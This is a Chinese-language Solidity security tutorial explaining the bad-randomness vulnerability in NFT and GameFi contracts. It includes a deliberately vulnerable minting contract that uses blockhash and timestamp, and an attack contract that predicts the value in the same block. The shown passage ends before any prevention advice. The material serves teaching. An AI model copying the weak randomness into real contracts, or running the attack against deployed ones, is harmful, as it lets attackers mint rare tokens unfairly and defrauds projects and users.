WTF Solidity 合約安全: S0...

首頁
專家專欄
WTF Solidity 合約安全: S07. 壞隨機數

WTF Solidity 合約安全: S07. 壞隨機數

發表於 2022-11-12 15:01 作者： Bress

我最近在重新學solidity，鞏固一下細節，也寫一個“WTF Solidity極簡入門”，供小白們使用（編程大佬可以另找教程），每周更新1-3講。

這一講，我們將介紹智能合約的壞隨機數（Bad Randomness）漏洞和預防方法，這個漏洞經常在 NFT 和 GameFi 中出現，包括 Meebits，Loots，Wolf Game等。

僞隨機數

很多以太坊上的應用都需要用到隨機數，例如NFT隨機抽取tokenId、抽盲盒、gamefi战鬥中隨機分勝負等等。但是由於以太坊上所有數據都是公开透明（public）且確定性（deterministic）的，它沒有其他編程語言一樣給开發者提供生成隨機數的方法，例如random()。很多項目方不得不使用鏈上的僞隨機數生成方法，例如 blockhash() 和 keccak256() 方法。

壞隨機數漏洞：攻擊者可以事先計算這些僞隨機數的結果，從而達到他們想要的目的，例如鑄造任何他們想要的稀有NFT而非隨機抽取。更多的內容可以閱讀 WTF Solidity極簡教程第39講：僞隨機數。

壞隨機數案例

下面我們學習一個有壞隨機數漏洞的 NFT 合約： BadRandomness.sol。

contract BadRandomness is ERC721 {    uint256 totalSupply;    // 構造函數，初始化NFT合集的名稱、代號    constructor() ERC721("", ""){}    // 鑄造函數：當輸入的 luckyNumber 等於隨機數時才能mint    function luckyMint(uint256 luckyNumber) external {        uint256 randomNumber = uint256(keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))) % 100; // get bad random number        require(randomNumber == luckyNumber, "Better luck next time!");        _mint(msg.sender, totalSupply); // mint        totalSupply++;    }}

它有一個主要的鑄造函數 luckyMint()，用戶調用時輸入一個 0-99 的數字，如果和鏈上生成的僞隨機數 randomNumber 相等，即可鑄造幸運 NFT。僞隨機數使用 blockhash 和 block.timestamp 聲稱。這個漏洞在於用戶可以完美預測生成的隨機數並鑄造NFT。

下面我們寫個攻擊合約 Attack.sol。

contract Attack {    function attackMint(BadRandomness nftAddr) external {        // 提前計算隨機數        uint256 luckyNumber = uint256(            keccak256(abi.encodePacked(blockhash(block.number - 1), block.timestamp))        ) % 100;        // 利用 luckyNumber 攻擊        nftAddr.luckyMint(luckyNumber);    }}

攻擊函數 attackMint()中的參數爲 BadRandomness合約地址。在其中，我們計算了隨機數 luckyNumber，然後將它作爲參數輸入到 luckyMint() 函數完成攻擊。由於attackMint()和luckyMint()將在同一個區塊中調用，blockhash和block.timestamp是相同的，利用他們生成的隨機數也相同。